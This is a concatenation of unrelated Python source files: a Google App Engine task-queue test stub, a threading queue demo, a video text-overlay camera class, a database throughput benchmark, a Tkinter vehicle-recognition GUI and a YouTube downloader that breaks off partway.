'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
          'headers': [('user-header', 'some-value'),
                      ('X-AppEngine-QueueName', 'update-queue'),
                      ('X-AppEngine-TaskName', 'task-123'),
                      ('X-AppEngine-TaskRetryCount', '0'),
                      ('X-AppEngine-TaskETA', '1234567890.123456'),
                      ('X-AppEngine-Development-Payload', '1'),
                      ('Content-Length', 0),
                      ('Content-Type', 'application/octet-stream')]}, ...]
Raises:
ValueError: A task request contains an unknown HTTP method type.
KeyError: An invalid queue name was specified.
"""
return self._GetGroup().GetQueue(queue_name).GetTasksAsDicts()
def DeleteTask(self, queue_name, task_name):
"""Deletes a task from a queue, without leaving a tombstone.
Args:
queue_name: the name of the queue to delete the task from.
task_name: the name of the task to delete.
"""
if self._GetGroup().HasQueue(queue_name):
queue = self._GetGroup().GetQueue(queue_name)
queue.Delete(task_name)
queue.task_name_archive.discard(task_name)
def FlushQueue(self, queue_name):
"""Removes all tasks from a queue, without leaving tombstones.
Args:
queue_name: the name of the queue to remove tasks from.
"""
if self._GetGroup().HasQueue(queue_name):
self._GetGroup().GetQueue(queue_name).PurgeQueue()
self._GetGroup().GetQueue(queue_name).task_name_archive.clear()
def _Dynamic_UpdateQueue(self, request, unused_response):
"""Local implementation of the UpdateQueue RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
unused_response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
Not used.
"""
self._GetGroup(_GetAppId(request)).UpdateQueue_Rpc(request, unused_response)
def _Dynamic_FetchQueues(self, request, response):
"""Local implementation of the FetchQueues RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueues_Rpc(request, response)
def _Dynamic_FetchQueueStats(self, request, response):
"""Local 'random' implementation of the TaskQueueService.FetchQueueStats.
    This implementation loads some stats from the task store and fills in the rest
    with random numbers.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueueStats_Rpc(request, response)
def _Dynamic_QueryTasks(self, request, response):
"""Local implementation of the TaskQueueService.QueryTasks RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._GetGroup(_GetAppId(request)).QueryTasks_Rpc(request, response)
def _Dynamic_FetchTask(self, request, response):
"""Local implementation of the TaskQueueService.FetchTask RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._GetGroup(_GetAppId(request)).FetchTask_Rpc(request, response)
def _Dynamic_Delete(self, request, response):
"""Local delete implementation of TaskQueueService.Delete.
    Deletes tasks from the task store. There is a 1/20 chance of a transient error.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._GetGroup(_GetAppId(request)).Delete_Rpc(request, response)
def _Dynamic_ForceRun(self, request, response):
"""Local force run implementation of TaskQueueService.ForceRun.
Forces running of a task in a queue. This will fail randomly for testing if
the app id is non-empty.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueForceRunRequest.
response: A taskqueue_service_pb.TaskQueueForceRunResponse.
"""
if _GetAppId(request) is not None:
if random.random() <= 0.05:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
elif random.random() <= 0.052:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR)
else:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.OK)
else:
group = self._GetGroup(None)
if not group.HasQueue(request.queue_name()):
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
return
queue = group.GetQueue(request.queue_name())
task = queue.Lookup(1, name=request.task_name())
if not task:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK)
return
queue.RunTaskNow(task[0])
self._UpdateNextEventTime(0)
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.OK)
def _Dynamic_DeleteQueue(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).DeleteQueue_Rpc(request, response)
def _Dynamic_PauseQueue(self, request, response):
"""Local pause implementation of TaskQueueService.PauseQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).PauseQueue_Rpc(request, response)
def _Dynamic_PurgeQueue(self, request, response):
"""Local purge implementation of TaskQueueService.PurgeQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._GetGroup(_GetAppId(request)).PurgeQueue_Rpc(request, response)
def _Dynamic_DeleteGroup(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteGroup.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteGroupRequest.
response: A taskqueue_service_pb.TaskQueueDeleteGroupResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if app_id in self._queues:
del self._queues[app_id]
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
def _Dynamic_UpdateStorageLimit(self, request, response):
"""Local implementation of TaskQueueService.UpdateStorageLimit.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateStorageLimitRequest.
response: A taskqueue_service_pb.TaskQueueUpdateStorageLimitResponse.
"""
if _GetAppId(request) is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if request.limit() < 0 or request.limit() > 1000 * (1024 ** 4):
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
response.set_new_limit(request.limit())
def _Dynamic_QueryAndOwnTasks(self, request, response):
"""Local implementation of TaskQueueService.QueryAndOwnTasks.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().QueryAndOwnTasks_Rpc(request, response)
def _Dynamic_ModifyTaskLease(self, request, response):
"""Local implementation of TaskQueueService.ModifyTaskLease.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().ModifyTaskLease_Rpc(request, response)
def get_filtered_tasks(self, url=None, name=None, queue_names=None):
"""Get the tasks in the task queue with filters.
Args:
url: A URL that all returned tasks should point at.
name: The name of all returned tasks.
queue_names: A list of queue names to retrieve tasks from. If left blank
        this defaults to all available queues.
Returns:
A list of taskqueue.Task objects.
"""
all_queue_names = [queue['name'] for queue in self.GetQueues()]
if isinstance(queue_names, basestring):
queue_names = [queue_names]
if queue_names is None:
queue_names = all_queue_names
task_dicts = []
for queue_name in queue_names:
if queue_name in all_queue_names:
for task in self.GetTasks(queue_name):
if url is not None and task['url'] != url:
continue
if name is not None and task['name'] != name:
continue
task_dicts.append(task)
tasks = []
for task in task_dicts:
payload = base64.b64decode(task['body'])
headers = dict(task['headers'])
headers['Content-Length'] = str(len(payload))
eta = datetime.datetime.strptime(task['eta'], '%Y/%m/%d %H:%M:%S')
eta = eta.replace(tzinfo=taskqueue._UTC)
task_object = taskqueue.Task(name=task['name'], method=task['method'],
url=task['url'], headers=headers,
payload=payload, eta=eta)
tasks.append(task_object)
return tasks
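# A minimal usage sketch (hedged: the testbed setup is assumed and not part of this module).
# Tests typically obtain this stub through google.appengine.ext.testbed and then inspect
# enqueued work with get_filtered_tasks():
#
#   stub = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
#   tasks = stub.get_filtered_tasks(url='/update', queue_names=['default'])
#   # each entry is a taskqueue.Task with .name, .url, .payload, etc.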
|
queue_0408.py
|
# -*- coding: utf-8 -*-
# @version : Python3.6
# @Time : 2017/4/8 16:55
# @Author : Jianyang-Hu
# @contact : jianyang1993@163.com
# @File : queue_0408.py
# @Software: PyCharm
"""
queue 队列:
适用于多线程编程的先进先出数据结构,可以用来安全的传递多线程信息。
queue 方法:
先进先出 q = Queue.Queue(maxsize)
后进先出 a = Queue.LifoQueue(maxsize)
优先级 Queue.PriorityQueue(maxsize)
q = queue.Queue(maxsize=0) # 构造一个先进显出队列,maxsize指定队列长度,为0 时,表示队列长度无限制。
q.join() # 等到队列为kong的时候,在执行别的操作
q.qsize() # 返回队列的大小 (不可靠)
q.empty() # 当队列为空的时候,返回True 否则返回False (不可靠)
q.full() # 当队列满的时候,返回True,否则返回False (不可靠)
q.put(item, block=True, timeout=None) # 将item放入Queue尾部,item必须存在,可以参数block默认为True,
表示当队列满时,会等待队列给出可用位置,为False时为非阻塞,此时如果队列已满,会引发queue.Full 异常。
可选参数timeout,表示 会阻塞设置的时间,过后,如果队列无法给出放入item的位置,则引发 queue.Full 异常
q.get(block=True, timeout=None) # 移除并返回队列头部的一个值,可选参数block默认为True,表示获取值的时候,
如果队列为空,则阻塞,为False时,不阻塞,若此时队列为空,则引发 queue.Empty异常。
可选参数timeout,表示会阻塞设置的时候,过后,如果队列为空,则引发Empty异常。
q.put_nowait(item) # 等效于 put(item,block=False)
q.get_nowait() # 等效于 get(item,block=False)
"""
# Producer-consumer model
import queue
import threading
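# A minimal sketch of the non-blocking behaviour described in the docstring above; the helper
# name _nowait_demo is illustrative only and is never called by this script.
def _nowait_demo():
    demo_q = queue.Queue(maxsize=1)
    demo_q.put_nowait("a")      # succeeds; the queue is now full
    try:
        demo_q.put_nowait("b")  # full queue -> raises queue.Full immediately
    except queue.Full:
        pass
    try:
        demo_q.get_nowait()     # returns "a"
        demo_q.get_nowait()     # empty queue -> raises queue.Empty immediately
    except queue.Empty:
        pass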
# Create a FIFO queue (container) with maxsize 10, so at most 10 items can be held at once
que = queue.Queue(10)
def s(i):
que.put(i)
print("size:", que.qsize())
def x(i):
    g = que.get()  # get() takes no item argument; passing i would only be treated as the block flag
#print("get:", g)
for i in range(1, 13):
t = threading.Thread(target=s, args=(i,))
t.start()
for i in range(1, 11):
t = threading.Thread(target=x, args=(i,))
t.start()
print("size:", que.qsize())
|
OverlayCamera.py
|
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
import cv2
import textwrap
from .settings import STREAM_URL
from .settings import TEXT_DATA_REFRESH
from .settings import TEXT_SPACE, TEXT_SIZE
from .settings import TEXT_FONT, TEXT_THICCNESS, TEXT_COLOR
from .settings import TEXT_DATA_FILENAMES
from .settings import TEXT_WRAP, TEXT_MARGINES, TEXT_MARGINES_BETWEEN_FILES
from .settings import TEXT_ALIGNMENTS, TEXT_ALIGNMENT_VERTICAL, TEXT_ALIGNMENT_HORIZONTAL
from .settings import OUTPUT_SCALE
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
last_update = time.time()
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@staticmethod
def _update():
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
if time.time() - BaseCamera.last_update > TEXT_DATA_REFRESH:
BaseCamera.last_update = time.time()
cls._update()
BaseCamera.thread = None
class OverlayCamera(BaseCamera):
textLines = ['']
textData = (0, 0)
offset = (0, 0)
render_pos = [0, 0]
width = 0
height = 0
@staticmethod
def _update():
OverlayCamera.textLines = []
height = 0
max_width = 0
number_of_lines = 0
for textFileName in TEXT_DATA_FILENAMES:
            if textFileName is None:
                OverlayCamera.textLines.append([])
                continue
try:
with open(textFileName, 'r') as textData:
pureTextLines = [x.strip() for x in textData.readlines()]
wrappedLines = []
for pureTextLine in pureTextLines:
wrappedLines.extend(textwrap.wrap(pureTextLine, width=TEXT_WRAP))
OverlayCamera.textLines.append(wrappedLines)
number_of_lines += len(OverlayCamera.textLines[-1])
for textLine in wrappedLines:
lineSize = cv2.getTextSize(textLine, TEXT_FONT, TEXT_SIZE, TEXT_THICCNESS)[0]
max_width = max(max_width, lineSize[0])
height = (lineSize[1] + 10) * TEXT_SIZE
except:
print(f'[ERROR] File {textFileName} not available')
OverlayCamera.textData = (max_width, height)
OverlayCamera.offset = (int(max_width), int(height * number_of_lines))
# print('yes')
# print(number_of_lines)
# print(OverlayCamera.textData)
OverlayCamera.render_pos = [0, 0]
if TEXT_ALIGNMENT_VERTICAL == TEXT_ALIGNMENTS.START:
OverlayCamera.render_pos[1] = 0
elif TEXT_ALIGNMENT_VERTICAL == TEXT_ALIGNMENTS.CENTER:
OverlayCamera.render_pos[1] = int(OverlayCamera.height / 2 - OverlayCamera.offset[1] / 2)
elif TEXT_ALIGNMENT_VERTICAL == TEXT_ALIGNMENTS.END:
OverlayCamera.render_pos[1] = int(OverlayCamera.height - OverlayCamera.offset[1])
if TEXT_ALIGNMENT_HORIZONTAL == TEXT_ALIGNMENTS.START:
OverlayCamera.render_pos[0] = 0 + OverlayCamera.width
elif TEXT_ALIGNMENT_HORIZONTAL == TEXT_ALIGNMENTS.CENTER:
OverlayCamera.render_pos[0] = int(TEXT_SPACE / 2 - OverlayCamera.offset[0]) + OverlayCamera.width + 1
elif TEXT_ALIGNMENT_HORIZONTAL == TEXT_ALIGNMENTS.END:
OverlayCamera.render_pos[0] = int(TEXT_SPACE - OverlayCamera.offset[0]) + OverlayCamera.width + 1
OverlayCamera.render_pos[0] += (TEXT_MARGINES[3] - TEXT_MARGINES[1])
OverlayCamera.render_pos[1] += (TEXT_MARGINES[0] - TEXT_MARGINES[2])
@staticmethod
def frames():
vcap = cv2.VideoCapture(STREAM_URL)
if not vcap.isOpened():
raise RuntimeError('Could not start camera.')
OverlayCamera.width = int(vcap.get(3))
OverlayCamera.height = int(vcap.get(4))
DIM = (int((TEXT_SPACE + vcap.get(3)) * OUTPUT_SCALE), int(vcap.get(4) * OUTPUT_SCALE))
OverlayCamera._update()
last_frame = None
while True:
# read current frame
_, frame = vcap.read()
frame = cv2.copyMakeBorder(frame, 0, 0, 0, TEXT_SPACE, cv2.BORDER_CONSTANT, value=(255, 255, 255))
y = 0
x = 0
try:
for textFile in OverlayCamera.textLines:
for line in textFile:
cv2.putText(frame, line, (OverlayCamera.render_pos[0] + x, OverlayCamera.render_pos[1] + y), TEXT_FONT, TEXT_SIZE, TEXT_COLOR, TEXT_THICCNESS)
y += OverlayCamera.textData[1]
y += TEXT_MARGINES_BETWEEN_FILES[0] - TEXT_MARGINES_BETWEEN_FILES[2]
x += TEXT_MARGINES_BETWEEN_FILES[3] - TEXT_MARGINES_BETWEEN_FILES[1]
except:
print('[ERROR] Something wrong with text')
frame = cv2.resize(frame, DIM, interpolation = cv2.INTER_AREA)
# encode as a jpeg image and return it
try:
yield cv2.imencode('.jpg', frame)[1].tobytes()
except:
yield cv2.imencode('.jpg', last_frame)[1].tobytes()
else:
last_frame = frame
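# A minimal consumption sketch (hedged: Flask is not imported by this module; the names below are
# illustrative). frames() yields encoded JPEG bytes, so a typical MJPEG endpoint wraps get_frame()
# in a multipart generator:
#
#   def gen(camera):
#       while True:
#           frame = camera.get_frame()
#           yield b'--frame\r\nContent-Type: image/jpeg\r\n\r\n' + frame + b'\r\n'
#
#   # flask.Response(gen(OverlayCamera()), mimetype='multipart/x-mixed-replace; boundary=frame')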
|
database_throughput_test.py
|
#!/usr/bin/env python3
# Copyright 2017-2019 Nativepython Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import argparse
import sys
import time
from object_database import connect, Schema
def main(argv):
parser = argparse.ArgumentParser("Run a database throughput test")
parser.add_argument("host")
parser.add_argument("port")
parser.add_argument(
"--service-token", type=str, required=True,
help="the auth token to be used with this service"
)
parser.add_argument("seconds", type=float)
parser.add_argument("--threads", dest='threads', type=int, default=1)
parsedArgs = parser.parse_args(argv[1:])
db = connect(parsedArgs.host, parsedArgs.port, parsedArgs.service_token)
schema = Schema("database_throughput_test")
@schema.define
class Counter:
k = int
db.subscribeToSchema(schema)
t0 = time.time()
transactionCount = []
def doWork():
with db.transaction():
c = Counter()
while time.time() - t0 < parsedArgs.seconds:
with db.transaction():
c.k = c.k + 1
with db.view():
transactionCount.append(c.k)
threads = [threading.Thread(target=doWork) for _ in range(parsedArgs.threads)]
for t in threads:
t.start()
for t in threads:
t.join()
print(sum(transactionCount) / parsedArgs.seconds, " transactions per second")
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
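# A usage sketch (host, port and token below are placeholders, not values from this repo):
#
#   python database_throughput_test.py localhost 8000 10.0 --service-token MY_TOKEN --threads 4
#
# This connects to the object_database server, runs increment transactions against the Counter
# schema for 10 seconds from 4 threads, and prints the aggregate transactions-per-second figure.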
|
SHM.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 15 09:38:01 2021
@author: zjl-seu
"""
import cv2
import time
import numpy as np
import tkinter as tk
from VRmodel import VR
from threading import Thread
from PIL import Image, ImageTk
from tkinter import scrolledtext
from PIL import Image, ImageDraw, ImageFont
class GUI():
def __init__(self, width=1300, height=650):
self.w = width
self.h = height
self.title = "桥梁车载识别系统"
self.root = tk.Tk(className=self.title)
self.root.iconbitmap('tk.ico')
self.list1 = tk.StringVar()
self.list2 = tk.StringVar()
self.list3 = tk.StringVar()
self.list1.set("test.mp4")
        # Page 1
self.page0 = tk.Frame(self.root)
self.photo = tk.PhotoImage(file='桥梁背景.png')
tk.Label(self.page0, text="桥梁车载时空分布识别系统", justify="center", image=self.photo, compound="center", font=("华文行楷", 50), fg="blue").place(x=0, y=0, width=1300, height=600)
#text_label.pack()
#tk.Label(self.page0, font=('楷体', 50), text="桥梁车载时空分布识别系统").place(relx=0.5, rely=0.5, anchor=tk.CENTER)
self.page0.pack(fill=tk.BOTH, expand=True)
        # Page 2
self.page1 = tk.Frame(self.root)
self.frame1_1 = tk.Frame(self.page1)
self.frame1_2 = tk.Frame(self.page1)
self.frame1_2_1 = tk.Frame(self.frame1_2)
self.frame1_2_2 = tk.Frame(self.frame1_2)
self.frame1_2_2_1 = tk.Frame(self.frame1_2_2)
self.frame1_2_2_2 = tk.Frame(self.frame1_2_2)
label1_1 = tk.Label(self.frame1_1, text="")
label1_2 = tk.Label(self.frame1_1, font=('楷体', 25), text="桥梁上高清摄像机显示与识别")
label1_3 = tk.Label(self.frame1_1, text="")
label1_4 = tk.Label(self.frame1_2_1, font=('楷体',15), text="拍摄画面")
self.canvas1_1 = tk.Canvas(self.frame1_2_1, width=800, height=500, bg="#c4c2c2")
label1_5 = tk.Label(self.frame1_2_2_1, font=('楷体',15), text="请输入视频地址:")
entry1_1 = tk.Entry(self.frame1_2_2_1, textvariable=self.list1, highlightcolor="Fuchsia", highlightthickness=1, width=50)
label1_6 = tk.Label(self.frame1_2_2_1, text="")
label1_7 = tk.Label(self.frame1_2_2_1, font=('楷体',15), text="识别结果")
self.scrolledtext1_1 = scrolledtext.ScrolledText(self.frame1_2_2_1, font=('楷体',10), width=50, height=27, wrap=tk.WORD)
label1_8 = tk.Label(self.frame1_2_2_1, text="")
button1_1 = tk.Button(self.frame1_2_2_2, text="打开", font=('楷体',15), fg='Purple', width=15, height=2, command=self.video_open)
label1_9 = tk.Label(self.frame1_2_2_2, text=" ")
button1_2 = tk.Button(self.frame1_2_2_2, text="识别", font=('楷体',15), fg='Purple', width=15, height=2, command=self.detect_stop)
label1_10 = tk.Label(self.frame1_2_2_2, text=" ")
button1_3 = tk.Button(self.frame1_2_2_2, text="停止", font=('楷体',15), fg='Purple', width=15, height=2, command=self.video_close)
self.frame1_1.pack()
self.frame1_2.pack()
self.frame1_2_1.grid(row=0, column=0)
self.frame1_2_2.grid(row=0, column=1)
self.frame1_2_2_1.grid(row=0, column=0)
self.frame1_2_2_2.grid(row=1, column=0)
label1_1.grid(row=0, column=0)
label1_2.grid(row=1, column=0)
label1_3.grid(row=2, column=0)
label1_4.grid(row=0, column=0)
self.canvas1_1.grid(row=1, column=0)
label1_5.grid(row=0, column=0)
entry1_1.grid(row=1, column=0)
label1_6.grid(row=2, column=0)
label1_7.grid(row=3, column=0)
self.scrolledtext1_1.grid(row=4, column=0)
label1_8.grid(row=5, column=0)
button1_1.grid(row=0, column=0)
label1_9.grid(row=0, column=1)
button1_2.grid(row=0, column=2)
label1_10.grid(row=0, column=3)
button1_3.grid(row=0, column=4)
self.page1.forget()
        # Page 3
self.page2 = tk.Frame(self.root, bg='red')
self.page2.forget()
self.create_page()
self.vr = VR()
def create_page(self):
menu = tk.Menu(self.root)
self.root.config(menu=menu)
filemenu1 = tk.Menu(menu, tearoff=0)
menu.add_cascade(label='车牌识别展示', menu=filemenu1)
filemenu1.add_command(label='开始', command=self.page1_show)
filemenu2 = tk.Menu(menu, tearoff=0)
menu.add_cascade(label='车流结果展示', menu=filemenu2)
filemenu2.add_command(label='开始', command=self.page2_show)
def page1_show(self):
self.page0.forget()
self.page1.pack(fill=tk.BOTH, expand=True)
self.page2.forget()
def page2_show(self):
self.page0.forget()
self.page1.forget()
self.page2.pack(fill=tk.BOTH, expand=True)
@staticmethod
def thread_it(func, *args):
t = Thread(target=func, args=args)
        t.setDaemon(True)  # daemon: even if the main window closes, the thread keeps running in the background (not actually true!)
        t.start()  # start the thread
def video_open(self):
self.scrolledtext1_1.delete(0.0, "end")
self.list2.set("1")
self.list3.set("0")
video = self.list1.get()
t1 = time.time()
cap = cv2.VideoCapture(video)
while cap.isOpened():
if self.list2.get() == "1":
ret, frame = cap.read()
if ret == True:
self.video_play(frame)
if self.list3.get() == "1":
self.thread_it(self.video_detect, frame)
else:
break
else:
break
cap.release()
print(time.time()-t1)
def plt_rec(self, image):
fontc = ImageFont.truetype("simsun.ttc", 20, encoding="unic")
cv2.rectangle(image, (int(333), int(147)), (int(542), int(392)), (0, 0, 255), 2, cv2.LINE_AA)
image = Image.fromarray(image)
draw = ImageDraw.Draw(image)
draw.text((int(333)+10, int(147)-30), "ROI(500*500)", (0, 0, 255), font=fontc)
imagex = np.array(image)
return imagex
def video_play(self, frame):
img = cv2.resize(frame, (800, 500), interpolation=cv2.INTER_CUBIC)
img = self.plt_rec(img)
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
if isinstance(img, np.ndarray):
img = Image.fromarray(img.astype(np.uint8))
photo = ImageTk.PhotoImage(image=img)
self.canvas1_1.create_image([400, 250], image=photo)
self.canvas1_1.update_idletasks()
self.canvas1_1.update()
def video_detect(self, frame):
image = frame[200 : 700, 700 : 1200]
result = self.vr.main(image)
if result != None:
print(result[1])
self.scrolledtext1_1.insert("insert", result[1]+"-"+str(300)+'\n')
def detect_stop(self):
self.list3.set("1")
def video_close(self):
self.list2.set("0")
def center(self):
ws = self.root.winfo_screenwidth()
hs = self.root.winfo_screenheight()
x = int((ws/2) - (self.w/2))
y = int((hs/2) - (self.h/2))
self.root.geometry("{}x{}+{}+{}".format(self.w, self.h, x, y))
    # After the window-close event is received, show a confirmation dialog and close only if the user confirms
def window_close_handle(self):
if tk.messagebox.askyesnocancel("关闭确认窗口","确认要关闭窗口吗?"):
            self.root.destroy()  # close the window
    # loop: wait for user events
def loop(self):
        # disable window resizing
self.root.resizable(False, False)
        # center the window
self.center()
self.root.protocol('WM_DELETE_WINDOW', self.window_close_handle)
self.root.mainloop()
if __name__ == "__main__":
gui = GUI()
gui.loop()
|
YouTube Downloader.py
|
import os
import requests
import tkinter as tk
from tkinter import *
import threading
from pytube import YouTube
import pyperclip as pc
import validators as vd
from PIL import ImageTk, Image
from io import BytesIO
root = tk.Tk()
root.title("Youtube Video Downloader")
img = ImageTk.PhotoImage(Image.open("Assets/Images/Default.png"))
L_image = Label(root, image=img)
dir_path = os.getcwd()
def ret_copied_url():
url = pc.paste()
if vd.url(url):
return url
else:
return "https://www.youtube.com/watch?v=32HANv-bdJs"
def callbackInput(v_url):
print("Changed input.")
return True
def callbackEntry(v_url):
return True
def changed(*options):
print("Changed option: " + selectedOption.get())
# variables
qualityOptions = ["Select Quality"]
selectedOption = StringVar(root)
v_url = StringVar(root)
my_proxy = {"http": "", "https": ""}
v_url.trace("w", lambda name, index, mode, v_url=v_url: callbackInput(v_url))
selectedOption.trace("w", changed)
# Entries
E_url = Entry(
root,
textvariable=v_url,
validate="focusout",
validatecommand=callbackEntry(v_url),
width="75",
)
E_url.insert(END, ret_copied_url())
# Menu
qualityOptionsMenu = OptionMenu(root, selectedOption, *qualityOptions)
selectedOption.set("Select Quality")
videoTitle = Label(text="Video title")
def printtit(obj):
videoTitle.config(text=obj.title)
def onok():
url = E_url.get()
print(url)
video = YouTube(url)
printtit(obj=video)
# video.set_filename("DownLoaded YouTube Video")
videoStreams = video.streams.all()
qualityOptions = []
for stream in videoStreams:
if stream.resolution != None:
qualityOptions.append(
stream.resolution
+ " "
+ stream.subtype
+ " "
+ str(round(stream.filesize / 1048576, 1))
+ "Mb tag: "
+ stream.itag
)
# Reset selectedOption and delete all old options
selectedOption.set("")
qualityOptionsMenu["menu"].delete(0, "end")
for option in qualityOptions:
qualityOptionsMenu["menu"].add_command(
label=option, command=tk._setit(selectedOption, option)
)
selectedOption.set(qualityOptions[0])
# printing Video Thumbnail
t_url = video.thumbnail_url
response = requests.get(t_url)
img = Image.open(BytesIO(response.content))
img = ImageTk.PhotoImage(img)
L_image.configure(image=img)
root.mainloop()
def ondown():
def downloading(url, Selected_Option):
pathe = os.path.expanduser("~") + "/Downloads"
os.chdir(pathe)
def progress_function(stream, chunk, file_handle, bytes_remaining):
percentage = round((1 - bytes_remaining / stream.filesize) * 100)
L_gif.configure(image=frames[percentage])
frames = [
PhotoImage(
